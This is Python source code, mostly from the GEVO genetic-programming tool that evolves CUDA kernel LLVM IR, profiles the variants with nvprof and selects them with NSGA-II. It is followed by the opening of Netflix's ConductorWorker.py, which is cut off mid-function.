def __init__(self, evolution, idx, kernel, bin, verifier, n_samples=100):
self.idx = idx
self.num_samples = n_samples
self.kernels = kernel
self.appBinary = bin
self.verifier = verifier
self.args = []
self.golden = []
self.variance = []
self._evolution = evolution
def evaluate(self):
# Since self.golden has not been filled in yet, passing this testcase into
# resultCompare won't compare anything, which is exactly what we want here.
fitness = []
# Evaluate {self.num_samples} times and get the minimum number
golden_run = []
for i in range(self.num_samples):
fitness.append(self._evolution.execNVprofRetrive(self))
if None in fitness:
print(self.args)
raise Exception("Original binary execution error")
if self.verifier['mode'] == 'file':
for fname in self.verifier['output']:
golden_run_filename = f"{fname}.golden{str(self.idx)}.{i}"
os.rename(fname, golden_run_filename)
golden_run.append(golden_run_filename)
variancecalc.file(golden_run)
if self.verifier['mode'] == 'file':
for fname in self.verifier['output']:
golden_filename = f"{fname}.golden{str(self.idx)}"
self.golden.append(golden_filename)
self.fitness = (min([ value[0] for value in fitness ]), min([ value[1] for value in fitness ]))
if None in self.fitness:
print(self.args)
raise Exception("Original binary execution error")
def __init__(self, kernel, bin, profile, mutop, timeout=30, fitness='time', popsize=128,
llvm_src_filename='cuda-device-only-kernel.ll', use_fitness_map=True, combine_positive_epistasis=False,
CXPB=0.8, MUPB=0.1, err_rate='0.01', global_seed=None):
self.CXPB = CXPB
self.MUPB = MUPB
self.err_rate = err_rate
self.kernels = kernel
self.appBinary = bin
self.timeout = timeout
self.fitness_function = fitness
self.use_fitness_map = use_fitness_map
self.combine_positive_epistasis = combine_positive_epistasis
self.popsize = popsize
self.mutop = mutop.split(',')
self.rng = {}
if global_seed is not None:
random.seed(global_seed)
try:
with open(llvm_src_filename, 'r') as f:
self.initSrcEnc = f.read().encode()
except IOError:
print("File {} does not exist".format(llvm_src_filename))
exit(1)
self.verifier = profile['verify']
# Tools initialization
# Detect GPU property
cuda.init()
# TODO: check if there are multiple GPUs.
SM_MAJOR, SM_MINOR = cuda.Device(0).compute_capability()
self.mgpu = 'sm_' + str(SM_MAJOR) + str(SM_MINOR)
print(f'[Initializing GEVO] GPU compute capability: {self.mgpu}')
# check Nvidia Profiler exists
self.nvprof_path = shutil.which('nvprof')
if self.nvprof_path is None:
raise Exception('nvprof cannot be found')
print(f'[Initializing GEVO] nvprof detected: {self.nvprof_path}')
# Minimize both performance and error
creator.create("FitnessMin", base.Fitness, weights=(-1.0, -1.0))
creator.create("Individual", irind.llvmIRrep, fitness=creator.FitnessMin)
self.history = tools.History()
self.toolbox = base.Toolbox()
self.toolbox.register('mutate', self.mutLLVM)
self.toolbox.register('mate', self.cxOnePointLLVM)
# self.toolbox.register('select', tools.selDoubleTournament, fitness_size=2, parsimony_size=1.4, fitness_first=True)
self.toolbox.register('select', tools.selNSGA2)
self.toolbox.register('individual', creator.Individual, srcEnc=self.initSrcEnc, mgpu=self.mgpu)
self.toolbox.register('population', tools.initRepeat, list, self.toolbox.individual)
# Decorate the variation operators
self.toolbox.decorate("mate", self.history.decorator)
self.toolbox.decorate("mutate", self.history.decorator)
self.stats = tools.Statistics(lambda ind: ind.fitness.values)
self.stats.register("min", min)
self.stats.register("max", max)
self.logbook = tools.Logbook()
self.paretof = tools.ParetoFront()
self.logbook.header = "gen", "evals", "min", "max"
# Set up testcase
self.origin = creator.Individual(self.initSrcEnc, self.mgpu)
self.origin.ptx(self.cudaPTX)
arg_array = [[]]
for i, arg in enumerate(profile['args']):
if arg.get('bond', None) is None:
arg_array_next = [ e[:] for e in arg_array for _ in range(len(arg['value']))]
arg_array = arg_array_next
for e1, e2 in zip(arg_array, cycle(arg['value'])):
e1.append(e2)
else:
for e in arg_array:
bonded_arg = arg['bond'][0]
bonded_idx = profile['args'][bonded_arg]['value'].index(e[bonded_arg])
e.append(arg['value'][bonded_idx])
arg_array = [ [str(e) for e in args ] for args in arg_array ]
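# Worked example (illustrative profile): with profile['args'] =
#   [{'value': [1, 2]}, {'value': ['a', 'b']}, {'value': ['x', 'y'], 'bond': [0]}]
# the two unbonded args expand into their cartesian product
#   [[1, 'a'], [1, 'b'], [2, 'a'], [2, 'b']]
# and the bonded arg copies the value whose index matches arg 0's choice:
#   [[1, 'a', 'x'], [1, 'b', 'x'], [2, 'a', 'y'], [2, 'b', 'y']]
# yielding one fully-specified (stringified) argument list per test case.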
self.testcase = []
for i in range(len(arg_array)):
self.testcase.append( self._testcase(self, i, kernel, bin, profile['verify']) )
with Progress("[Initializing GEVO] Evaluate original program with test cases",
"({task.completed} / {task.total})",
rich.progress.TimeElapsedColumn()) as progress:
task = progress.add_task("", total=len(arg_array))
for tc, arg in zip(self.testcase, arg_array):
tc.args = arg
tc.evaluate()
progress.update(task, advance=1)
# Calculate variance
self.ofits = [ tc.fitness[0] for tc in self.testcase]
self.oerrs = [ tc.fitness[1] for tc in self.testcase]
self.origin.fitness.values = (sum(self.ofits)/len(self.ofits), max(self.oerrs))
self.editFitMap[tuple()] = self.origin.fitness.values
print(f"Average fitness of the original program: ({self.origin.fitness.values[0]:.2f}, {self.origin.fitness.values[1]:.2f})")
print("Individual test cases:")
for fit, err in zip(self.ofits, self.oerrs):
print(f"\t({fit:.2f}, {err:.2f})")
self.positive_epistasis = {}
self.negative_epistasis = {}
self.need_discussion = {}
def updateSlideFromPlot(self):
pffits = [ind.fitness.values for ind in self.paretof]
fits = [ind.fitness.values for ind in self.pop if ind.fitness.values not in pffits]
plt.gcf().subplots_adjust(bottom=0.15)
plt.title("Program variant performance - Generation {}".format(self.generation))
plt.xlabel("Runtime(ms)")
plt.ylabel("Error(%)")
if self.err_rate[-1] == '|':
err_rate = float(self.err_rate[0:-2])
elif self.err_rate[-1] == 's':
err_rate = float(self.err_rate[0:-2])
else:
err_rate = float(self.err_rate)
plt.ylim(ymin=-(float(err_rate)*100/20), ymax=float(err_rate)*100)
plt.xticks(rotation=45)
plt.scatter([fit[0]/1000 for fit in fits], [fit[1]*100 for fit in fits],
marker='*', label="dominated")
plt.scatter([pffit[0]/1000 for pffit in pffits], [pffit[1]*100 for pffit in pffits],
marker='o', c='red', label="pareto front")
plt.scatter(self.origin.fitness.values[0]/1000, self.origin.fitness.values[1]*100,
marker='x', c='green', label="origin")
plt.legend()
buf = io.BytesIO()
plt.savefig(buf, format='png')
buf.seek(0)
slide = self.presentation.slides.add_slide(self.presentation.slide_layouts[6])
left = top = pptx.util.Inches(1)
pic = slide.shapes.add_picture(buf, left, top)
buf.close()
self.presentation.save('progress.pptx')
plt.clf()
def writeStage(self):
pathlib.Path('stage').mkdir(exist_ok=True)
if self.generation == 0:
stageFileName = "stage/startedits.json"
rngFileName = "stage/startrng.pickle"
else:
stageFileName = "stage/" + str(self.generation) + ".json"
rngFileName = "stage/" + str(self.generation) + "_rng.pickle"
with open(stageFileName, 'w') as fp:
stage = [{'edits': ind.edits, 'fitness': ind.fitness.values} for ind in self.pop]
json.dump(stage, fp, indent=2)
rng_state = {}
rng_state['global'] = random.getstate()
rng_state['cx'] = self.rng['cx'].getstate()
rng_state['mut'] = self.rng['mut'].getstate()
rng_state['cx_local'] = [ rng.getstate() for rng in self.rng['cx_local']]
rng_state['mut_local'] = [ rng.getstate() for rng in self.rng['mut_local']]
with open(rngFileName, 'wb') as fp:
pickle.dump(rng_state, fp)
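# Checkpoint layout (values illustrative): each stage JSON file is a list
# with one entry per individual, e.g.
#   [{"edits": [...], "fitness": [123.4, 0.01]}, ...]
# while the companion pickle snapshots every RNG state so a resumed run
# replays exactly the same random choices.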
def mutLog(self):
print("gen {}".format(self.generation), file=self.mutLogFile)
print("Individual mutation opeartion statistic", file=self.mutLogFile)
print(" | c r i s m p", file=self.mutLogFile)
print("success|{:>10}{:>10}{:>10}{:>10}{:>10}{:>10}".format(
self.mutStats['op_success']['c'],
self.mutStats['op_success']['r'],
self.mutStats['op_success']['i'],
self.mutStats['op_success']['s'],
self.mutStats['op_success']['m'],
self.mutStats['op_success']['p'],
), file=self.mutLogFile)
print("fail |{:>10}{:>10}{:>10}{:>10}{:>10}{:>10}".format(
self.mutStats['op_fail']['c'],
self.mutStats['op_fail']['r'],
self.mutStats['op_fail']['i'],
self.mutStats['op_fail']['s'],
self.mutStats['op_fail']['m'],
self.mutStats['op_fail']['p'],
), file=self.mutLogFile)
print("", file=self.mutLogFile)
self.mutLogFile.flush()
numMut = ["Num of Mutation"]
count = ["Count"]
for key in self.mutStats['failDistribution']:
numMut.append(int(key))
count.append(self.mutStats['failDistribution'][key])
mutDistWrite = csv.writer(self.mutDistFile, quoting=csv.QUOTE_NONNUMERIC)
mutDistWrite.writerow(["Gen {}".format(self.generation)])
mutDistWrite.writerow(numMut)
mutDistWrite.writerow(count)
self.mutDistFile.flush()
def resultCompare(self, stdoutStr, testcase):
err = 0.0
if self.verifier['mode'] == 'string':
src = self.verifier['output']
golden = testcase.golden
result = src.find(golden) != -1
return result, err
elif self.verifier['mode'] == 'thundersvm':
for line in stdoutStr.splitlines():
if line.find('Cross Accuracy = ') != -1:
accuracy = float(line.replace('Cross Accuracy = ',''))
err = 1 - accuracy
result = err <= float(self.err_rate)
return result, err
return False, err
elif self.verifier['mode'] == 'caffe2':
for line in stdoutStr.splitlines():
if line.find('Accuracy = ') != -1:
accuracy = float(line.replace('Accuracy = ',''))
err = 1 - accuracy
result = err <= float(self.err_rate)
return result, err
return False, err
elif self.verifier['mode'] == 'file':
src = self.verifier['output']
golden = testcase.golden
result = True
for cnt, (s, g) in enumerate(zip(src, golden)):
fuzzy = self.verifier.get('fuzzy', False)
if isinstance(fuzzy, list):
try:
fuzzy = fuzzy[cnt]
except IndexError:
print("Verification Error: Fuzzy mode is a list but does not match the number of output files")
elif isinstance(fuzzy, bool):
pass
else:
raise Exception("Verification Error: fuzzy mode is not a single or a list of the boolean value")
if fuzzy:
try:
if self.err_rate[-1] == 's':
rc, maxerr, avgerr = fuzzycompare.file(s, f"{g}.mean", self.err_rate, f"{g}.stddev")
else:
rc, maxerr, avgerr = fuzzycompare.file(s, g, self.err_rate)
except IndexError:
return False, 1
# if rc < 0:
# raise Exception(msg)
result = result and rc == 0
err = maxerr if maxerr > err else err
else:
try:
result = result & filecmp.cmp(s, g)
except IOError:
print(f"Verification Error: File {src} or {golden} cannot be found")
return result, err
else:
raise Exception("Verification Error: Unknown comparing mode \"{}\" in the json profile".format(
self.verifier['mode']))
def identify_positive_epistasis(self, ind, updateEpiTable=True):
if (len(ind.edits) < 2):
return
tmp_edits = list(ind.edits)
ret_edits = []
while len(tmp_edits) != 0:
edit = tmp_edits[0]
if isinstance(edit, irind.edit):
mut_fields = edit[0][1].split(',')
on_mutated_instruction = False
for mut_field in mut_fields:
try:
suffix = mut_field.split('.', maxsplit=1)[1]
if suffix.find('OP') == -1:
on_mutated_instruction = True
break
except IndexError:
pass
if on_mutated_instruction:
tmp_edits.remove(edit)
ret_edits.append(edit)
continue
else:
# a complex edit cannot fail the test by itself, thus it won't depend on
# others; only others can depend on it
tmp_edits.remove(edit)
ret_edits.append(edit)
continue
edit_key = edits_as_key([edit])
if edit_key not in self.editFitMap.keys():
if updateEpiTable:
tmp_ind = creator.Individual(self.initSrcEnc, self.mgpu, [edit])
with lock:
self.evaluate(tmp_ind, 'epi')
else:
tmp_edits.remove(edit)
ret_edits.append(edit)
continue
if None not in self.editFitMap[edit_key]:
tmp_edits.remove(edit)
ret_edits.append(edit)
continue
# Epistasis found. Check if epistasis map already has the record
rest = [ e for e in (tmp_edits+ret_edits) if e != edit ]
with lock:
if edit in self.positive_epistasis.keys():
found = False
for dependant in self.positive_epistasis[edit]:
if dependant in rest:
found = True
tmp_edits.remove(edit)
if dependant in ret_edits:
ret_edits.remove(dependant)
else:
tmp_edits.remove(dependant)
ret_edits.append(tuple([edit, dependant]))
break
if found:
continue
if updateEpiTable:
identified = False
for e_rest in rest:
if edits_as_key([edit, e_rest]) not in self.editFitMap:
tmp_ind = creator.Individual(self.initSrcEnc, self.mgpu, [edit, e_rest])
self.evaluate(tmp_ind, 'epi')
if None not in self.editFitMap[edits_as_key([edit, e_rest])]:
if e_rest in ret_edits:
ret_edits.remove(e_rest)
else:
tmp_edits.remove(e_rest)
tmp_edits.remove(edit)
ret_edits.append(tuple([edit, e_rest]))
if e_rest not in self.positive_epistasis.setdefault(edit, []):
self.positive_epistasis[edit].append(e_rest)
identified = True
break
if identified is True:
continue
else:
self.need_discussion.setdefault(edit, []).append(rest)
ret_edits.append(edit)
tmp_edits.remove(edit)
assert(edits_as_key(ret_edits) == ind.key)
ind.update_edits(ret_edits)
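# Here, "positive epistasis" denotes an edit whose single-edit fitness in
# editFitMap is (None, None) -- it fails on its own -- even though the whole
# individual passes, so some other edit must be rescuing it. The loop above
# pairs such an edit with each remaining edit until a passing pair is found,
# then fuses the pair into a single compound edit.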
def mutLLVM(self, individual, rng:random.Random):
trial = 0
operations = self.mutop
while trial < individual.lineSize*2:
if self.terminateEvent.is_set():
return individual,
line1 = rng.randint(1, individual.lineSize)
line2 = rng.randint(1, individual.lineSize)
while line1 == line2:
line2 = rng.randint(1, individual.lineSize)
seed = rng.getrandbits(16)
op = rng.choice(operations)
if op == 'p' or op == 'x':
rc, _, editUID = llvmMutateWrap(individual.srcEnc, op, str('Rand'), str('Rand'), seed)
else:
rc, _, editUID = llvmMutateWrap(individual.srcEnc, op, str(line1), str(line2), seed)
if rc < 0:
continue
if editUID in individual.serialized_edits:
continue
try:
test_ind = creator.Individual(self.initSrcEnc, self.mgpu, individual.edits + [editUID])
except irind.llvmIRrepRuntimeError:
continue
with lock:
if self.terminateEvent.is_set():
return individual,
trial = trial + 1
fit = self.evaluate(test_ind, 'mut')
if None in fit:
self.mutStats['invalid'] = self.mutStats['invalid'] + 1
self.mutStats['op_fail'][op] = self.mutStats['op_fail'][op] + 1
continue
self.mutStats['valid'] = self.mutStats['valid'] + 1
self.mutStats['op_success'][op] = self.mutStats['op_success'][op] + 1
self.mutStats['failDistribution'][str(trial)] = \
self.mutStats['failDistribution'][str(trial)] + 1 \
if str(trial) in self.mutStats['failDistribution'] else 1
if self.combine_positive_epistasis:
self.identify_positive_epistasis(test_ind, updateEpiTable=False)
individual.copy_from(test_ind)
individual.fitness.values = fit
return individual,
print("Cannot get mutant to survive in {} trials".format(individual.lineSize*2))
self.mutStats['failDistribution']['-1'] = self.mutStats['failDistribution']['-1'] + 1
with lock:
fit = self.evaluate(individual, 'mut')
individual.fitness.values = fit
return individual,
def cxOnePointLLVM(self, ind1, ind2, rng:random.Random):
trial = 0
if ind1 == ind2:
return ind1, ind2
editSet1 = set(ind1.edits)
editSet2 = set(ind2.edits)
# The following sorting is to make the order deterministic
intersectionEdits = sorted(list(editSet1.intersection(editSet2)))
symmetricEdits = sorted(list(editSet1.symmetric_difference(editSet2)))
if len(symmetricEdits) < 2:
return ind1, ind2
while trial < len(ind1.edits) + len(ind2.edits):
if self.terminateEvent.is_set():
return ind1, ind2
rng.shuffle(symmetricEdits)
point = rng.randint(1, len(symmetricEdits)-1)
cmd1 = intersectionEdits + symmetricEdits[:point]
cmd2 = intersectionEdits + symmetricEdits[point:]
try:
child1 = creator.Individual(self.initSrcEnc, self.mgpu, cmd1)
child2 = creator.Individual(self.initSrcEnc, self.mgpu, cmd2)
except irind.llvmIRrepRuntimeError:
trial = trial + 1
continue
with lock:
if self.terminateEvent.is_set():
return ind1, ind2
fit1 = self.evaluate(child1, 'cx')
fit2 = self.evaluate(child2, 'cx')
trial = trial + 1
if None in fit1 and None in fit2:
continue
if None not in fit1:
ind1.copy_from(child1)
ind1.fitness.values = fit1
if None not in fit2:
ind2.copy_from(child2)
ind2.fitness.values = fit2
return ind1, ind2
print("Cannot get crossover to survive in {} trials".format(len(ind1.edits) + len(ind2.edits)))
return ind1, ind2
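# Crossover sketch (illustrative edit sets): edits common to both parents are
# always inherited; only the symmetric difference is split at a random point:
#   parent1 = {A, B, C}, parent2 = {A, D}
#   intersection = [A], shuffled symmetric difference = [C, D, B], point = 1
#   child1 edits = [A, C]        child2 edits = [A, D, B]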
def execNVprofRetrive(self, testcase):
proc = subprocess.Popen([self.nvprof_path,
'--unified-memory-profiling', 'off',
# '--profile-from-start', 'off',
'--profile-child-processes',
'--profile-api-trace', 'none',
'--system-profiling', 'on',
'--csv',
'-u', 'us',
'./' + self.appBinary] + testcase.args,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
gc.disable()
all_time = time.perf_counter()
stdout, stderr = proc.communicate(timeout=self.timeout) # second
all_time = time.perf_counter() - all_time
gc.enable()
retcode = proc.poll()
# retcode == 9: error is from testing program, not nvprof
# retcode == 15: Target program receive segmentation fault
if retcode == 9 or retcode == 15:
print('x', end='', flush=True)
return None, None
# Unknown nvprof error
if retcode != 0:
print(stderr.decode(), file=sys.stderr)
raise Exception('Unknown nvprof error code:{}'.format(retcode))
except subprocess.TimeoutExpired:
# Sometimes terminating nvprof will not terminate the underlying cuda program
# if that program is corrupted, so issue the kill command to those cuda apps first
print('8', end='', flush=True)
try:
parent = psutil.Process(proc.pid)
except psutil.NoSuchProcess:
return None, None
children = parent.children(recursive=True)
for subproc in children:
subproc.terminate()
subprocess.run(['killall', self.appBinary],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
proc.terminate()
proc.wait()
self.mutStats['infinite'] = self.mutStats['infinite'] + 1
return None, None
except KeyboardInterrupt:
return None, None
program_output = stdout.decode()
cmpResult, err = self.resultCompare(program_output, testcase)
if cmpResult is False:
print('x', end='', flush=True)
return None, None
else:
print('.', end='', flush=True)
profile_output = stderr.decode()
csv_list = list(csv.reader(io.StringIO(profile_output), delimiter=','))
# search for kernel function(s)
kernel_time = []
time_percent = []
energy = None
# The stats start after the 5th line
for line in csv_list[5:]:
if len(line) == 0:
continue
if line[0] == "GPU activities":
for name in self.kernels:
# 8th column for name of CUDA function call
try:
if line[7].split('(')[0] == name:
# 3rd column for avg execution time
kernel_time.append(float(line[2]))
time_percent.append(float(line[1]))
except (IndexError, ValueError):
continue
if line[0] == "Power (mW)":
count = int(line[2])
avg_power = float(line[3])
# Empirical data shows that the sampling frequency is around 50Hz
energy = count * avg_power / 20
if len(self.kernels) == len(kernel_time) and energy is not None:
if self.fitness_function == 'time' or self.fitness_function == 'all_time':
# total_kernel_time = sum(kernel_time)*100 / sum(time_percent)
return all_time, err
# return sum(kernel_time), err
elif self.fitness_function == 'kernel_time':
# total_kernel_time = sum(kernel_time)*100 / sum(time_percent)
total_kernel_time = sum(kernel_time)
return total_kernel_time, err
# return sum(kernel_time), err
elif self.fitness_function == 'power':
return energy, err
else:
print("Can not find kernel \"{}\" from nvprof".format(self.kernels), file=sys.stderr)
return None, None
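# Layout assumed by the parser above (abbreviated nvprof --csv output, per
# the inline comments): for "GPU activities" rows, line[1] is the kernel's
# time percentage, line[2] its average time, and line[7] the kernel name;
# a "Power (mW)" row supplies the sample count (line[2]) and average power
# (line[3]) used for the energy estimate.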
def evaluate(self, individual, mode=None):
if mode == 'cx':
print('c', end='', flush=True)
elif mode == 'mut':
print('m', end='', flush=True)
elif mode == 'epi':
print('e', end='', flush=True)
# first, check whether the same entry already exists in the editFitMap
editkey = individual.key
if self.use_fitness_map is True:
if editkey in self.editFitMap:
print('r', end='', flush=True)
return self.editFitMap[editkey]
# link/compile this individual's edited IR into PTX
try:
individual.ptx(self.cudaPTX)
except:
self.editFitMap[editkey] = (None, None)
if mode is not None:
self.evalStats[mode]['fail'][-1] = self.evalStats[mode]['fail'][-1] + 1
return None, None
with open('gevo.ll', 'w') as f:
f.write(individual.srcEnc.decode())
fits = []
errs = []
for tc in self.testcase:
fitness, err = self.execNVprofRetrive(tc)
for res_file in self.verifier['output']:
if os.path.exists(res_file):
os.remove(res_file)
if fitness is None or err is None:
self.editFitMap[editkey] = (None, None)
if mode is not None:
self.evalStats[mode]['fail'][-1] = self.evalStats[mode]['fail'][-1] + 1
return None, None
fits.append(fitness)
errs.append(err)
max_err = max(errs)
avg_fitness = sum(fits)/len(fits)
# record the edits and the corresponding fitness in the map
self.editFitMap[editkey] = (avg_fitness, max_err)
if mode is not None:
self.evalStats[mode]['pass'][-1] = self.evalStats[mode]['pass'][-1] + 1
return avg_fitness, max_err
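# Cache semantics (summary): editFitMap maps the canonical key of an
# individual's edit list to its measured (avg_fitness, max_err); invalid
# variants are cached as (None, None) so they are never re-executed, and the
# 'r' printed above marks such a cache hit being reused.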
def evolve(self, resumeGen):
self.rng['mut'] = random.Random(random.getrandbits(16))
self.rng['cx'] = random.Random(random.getrandbits(16))
if resumeGen == -1:
# popSize must be a multiple of 4 for selTournamentDCD to function properly
popSize = self.popsize
self.rng['mut_local'] = [ random.Random(random.getrandbits(16)) for i in range(popSize) ]
self.rng['cx_local'] = [ random.Random(random.getrandbits(16)) for i in range(popSize) ]
print("Initialize the population. Size {}".format(popSize))
self.pop = self.toolbox.population(n=popSize)
with Progress(auto_refresh=False) as pbar:
task1 = pbar.add_task("", total=popSize)
for cnt, ind in enumerate(self.pop):
pbar.update(task1, completed=cnt+1, refresh=True,
description=f"Initializing Population with 3 mutations({cnt+1}/{popSize}), "\
f"m:(p:{self.evalStats['mut']['pass'][-1]},f:{self.evalStats['mut']['fail'][-1]}), "\
f"c:(p:{self.evalStats['cx']['pass'][-1]},f:{self.evalStats['cx']['fail'][-1]}), "\
f"e:(p:{self.evalStats['epi']['pass'][-1]},f:{self.evalStats['epi']['fail'][-1]})")
_fit = (None, None)
while None in _fit:
_ind1 = creator.Individual(self.initSrcEnc, self.mgpu)
_ind2 = creator.Individual(self.initSrcEnc, self.mgpu)
_ind3 = creator.Individual(self.initSrcEnc, self.mgpu)
self.toolbox.mutate(_ind1, self.rng['mut'])
self.toolbox.mutate(_ind2, self.rng['mut'])
self.toolbox.mutate(_ind3, self.rng['mut'])
_ind = creator.Individual(self.initSrcEnc, self.mgpu, _ind1.edits + _ind2.edits + _ind3.edits)
_fit = self.evaluate(_ind)
ind.copy_from(_ind)
ind.fitness.values = _fit
self.writeStage()
else:
if resumeGen == 0:
stageFileName = "stage/startedits.json"
rngFileName = "stage/startrng.pickle"
else:
stageFileName = "stage/" + str(resumeGen) + ".json"
rngFileName = "stage/" + str(resumeGen) + "_rng.pickle"
try:
stage = json.load(open(stageFileName))
allEdits = [ irind.encode_edits_from_list(entry['edits']) for entry in stage ]
except:
print(f"GEVO Error in loading stage file \"{stageFileName}\"")
print(sys.exc_info())
exit(1)
try:
with open('stage/editmap.pickle', 'rb') as editFitMapFile:
print('[resuming GEVO] Previous EditFitMap found ... ', end='')
self.editFitMap = pickle.load(editFitMapFile)
print(f'{len(self.editFitMap)} entries loaded')
except FileNotFoundError:
pass
popSize = len(allEdits)
try:
print(f'[resuming GEVO] Loading random number generator from {rngFileName} ... ', end='')
with open(rngFileName, 'rb') as fp:
rng_state = pickle.load(fp)
random.setstate(rng_state['global'])
self.rng['cx'].setstate(rng_state['cx'])
self.rng['mut'].setstate(rng_state['mut'])
self.rng['mut_local'] = [ random.Random() for i in range(popSize) ]
for rng, state in zip(self.rng['mut_local'], rng_state['mut_local']):
rng.setstate(state)
self.rng['cx_local'] = [ random.Random() for i in range(popSize) ]
for rng, state in zip(self.rng['cx_local'], rng_state['cx_local']):
rng.setstate(state)
print('done')
except FileNotFoundError:
print(f"GEVO Error in loading rng file \"{rngFileName}\"")
print(sys.exc_info())
exit(1)
print(f"[resuming GEVO] Rebuilding the population from {stageFileName}. Size {popSize}")
self.pop = self.toolbox.population(n=popSize)
self.generation = resumeGen
resultList = [False] * popSize
for i, (edits, ind) in enumerate(zip(allEdits, self.pop)):
ind.update_edits(edits)
self.threadPool.append(
Thread(target=irind.update_from_edits, args=(i, ind, resultList))
)
self.threadPool[-1].start()
for i, ind in enumerate(self.pop):
self.threadPool[i].join()
if not resultList[i]:
raise Exception(f"Could not reconstruct ind from edits:{ind.edits}")
fitness = self.evaluate(ind)
if None in fitness:
for edit in ind.edits:
print(edit)
raise Exception("Encounter invalid individual during reconstruction")
# if self.combine_positive_epistasis:
# self.identify_positive_epistasis(ind)
ind.fitness.values = fitness
# This is to assign the crowding distance to the individuals
# and also to sort the pop with front rank
self.pop = self.toolbox.select(self.pop, popSize)
self.history.update(self.pop)
record = self.stats.compile(self.pop)
self.paretof.update(self.pop)
self.logbook.record(gen=0, evals=popSize, **record)
print("")
print(self.logbook.stream)
self.updateSlideFromPlot()
self.mutLogFile = open('mut_stat.log', 'w')
self.mutDistFile = open('mut_dist.csv', 'w')
self.mutLog()
self.progressFile = open('progress.csv', 'w')
self.progressFile.write(f'{self.generation},{record["min"][0]},\n')
minExecTime = record["min"][0]
print("")
# pffits = [ind.fitness.values for ind in self.paretof]
# fits = [ind.fitness.values for ind in self.pop if ind not in pffits]
# plt.scatter([fit[0] for fit in fits], [fit[1] for fit in fits], marker='*')
# plt.scatter([pffits[0] for fit in fits], [pffits[1] for fit in fits], marker='o', c=red)
# plt.savefig(str(self.generation) + '.png')
rapid_mutation = False
no_fitness_change = -5 # give more generations at start before rapid mutation
while True:
offspring = tools.selTournamentDCD(self.pop, popSize)
# Clone the selected individuals
offspring = list(map(self.toolbox.clone, offspring))
paretofGen = tools.sortNondominated(self.pop, popSize, first_front_only=True)
paretofGen[0].sort(key=lambda ind: ind.fitness.values[0])
with open("g{}_noerr.ll".format(self.generation), 'w') as f:
f.write(paretofGen[0][-1].srcEnc.decode())
with open("g{}_noerr.edit".format(self.generation), 'w') as f:
print(paretofGen[0][-1].edits, file=f)
with open("g{}_maxerr.ll".format(self.generation), 'w') as f:
f.write(paretofGen[0][0].srcEnc.decode())
with open("g{}_maxerr.edit".format(self.generation), 'w') as f:
print(paretofGen[0][0].edits, file=f)
with open("stage/editmap.pickle", 'wb') as emfile:
pickle.dump(self.editFitMap, emfile)
self.generation = self.generation + 1
for _, value in self.evalStats.items():
value['pass'].append(0)
value['fail'].append(0)
self.threadPool.clear()
for cnt, (child1, child2) in enumerate(zip(offspring[::2], offspring[1::2])):
if len(child1.edits) < 2 and len(child2.edits) < 2:
continue
if self.rng['cx'].random() < self.CXPB:
self.threadPool.append(
Thread(target=self.toolbox.mate, args=(child1, child2, self.rng['cx_local'][cnt])))
self.threadPool[-1].start()
for thread in self.threadPool:
thread.join()
self.threadPool.clear()
for cnt, mutant in enumerate(offspring):
if self.rng['mut'].random() < self.MUPB:
del mutant.fitness.values
self.threadPool.append(
Thread(target=self.toolbox.mutate, args=(mutant, self.rng['mut_local'][cnt])))
self.threadPool[-1].start()
for thread in self.threadPool:
thread.join()
dead_inds = [ ind for ind in self.pop if None in ind.fitness.values ]
assert(len(dead_inds) == 0)
elite = self.toolbox.select(self.pop, int(popSize/64))
if self.combine_positive_epistasis:
for ind in elite:
self.identify_positive_epistasis(ind)
self.pop = self.toolbox.select(elite + offspring, popSize)
record = self.stats.compile(self.pop)
self.logbook.record(gen=self.generation, evals=popSize, **record)
self.paretof.update(self.pop)
print("")
print(f"m:(p:{self.evalStats['mut']['pass'][-1]},f:{self.evalStats['mut']['fail'][-1]}), "\
f"c:(p:{self.evalStats['cx']['pass'][-1]},f:{self.evalStats['cx']['fail'][-1]}), "\
f"e:(p:{self.evalStats['epi']['pass'][-1]},f:{self.evalStats['epi']['fail'][-1]})")
print(self.logbook.stream)
self.mutLog()
self.progressFile.write(f'{self.generation},{record["min"][0]},\n')
self.progressFile.flush()
self.updateSlideFromPlot()
self.writeStage()
print("") # an empty line as a generation separator
def stop_evolve(self):
sys.stderr = open(os.devnull, "w")
self.terminateEvent.set()
subprocess.run(['killall', self.appBinary])
subprocess.run(['killall', 'llvm-mutate'])
while len(self.threadPool) > 0:
self.threadPool = [ t for t in self.threadPool if t.is_alive() ]
time.sleep(0)
print(" Valid variant: {}".format(self.mutStats['valid']))
print(" Invalid variant: {}".format(self.mutStats['invalid']))
print("Infinite variant: {}".format(self.mutStats['infinite']))
self.mutLog()
if self.generation > 0:
self.presentation.save('progress.pptx')
|
ConductorWorker.py | #
# Copyright 2017 Netflix, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function, absolute_import
import sys
import time
from conductor.conductor import WFClientMgr
from threading import Thread
import socket
hostname = socket.gethostname()
class ConductorWorker:
"""
Main class for implementing Conductor Workers
A conductor worker is a separate system that executes the various
tasks that the conductor server queues up for execution. The worker
can run on the same instance as the server or on a remote instance.
The worker generally provides a wrapper around some function that
performs the actual execution of the task. The function that is
being executed must return a `dict` with the `status`, `output` and
`logs` keys. If these keys are not present, the worker will raise an
Exception after completion of the task.
The start method is used to begin continuous polling and execution
of the tasks that the conductor server makes available. The same
script can run multiple workers using the wait argument. For more
details, view the start method
"""
def __init__(self, server_url, thread_count, polling_interval, worker_id=None):
"""
Parameters
----------
server_url: str
The url to the server hosting the conductor api.
Ex: 'http://localhost:8080/api'
thread_count: int
The number of threads that will be polling for and
executing tasks in case of using the start method.
polling_interval: float
The number of seconds that each worker thread will wait
between polls to the conductor server.
worker_id: str, optional
The worker_id of the worker that is going to execute the
task. For further details, refer to the documentation
By default, it is set to hostname of the machine
"""
wfcMgr = WFClientMgr(server_url)
self.workflowClient = wfcMgr.workflowClient
self.taskClient = wfcMgr.taskClient
self.thread_count = thread_count
self.polling_interval = polling_interval
self.worker_id = worker_id or hostname
def execute(self, task, exec_function):
try:
resp = exec_function(task)
if type(resp) is not dict or not all(key in resp for key in ('status', 'output', 'logs')):
raise Exception('Task execution function MUST return a response as a dict with status, output and logs fields')
task['status'] = resp['status']
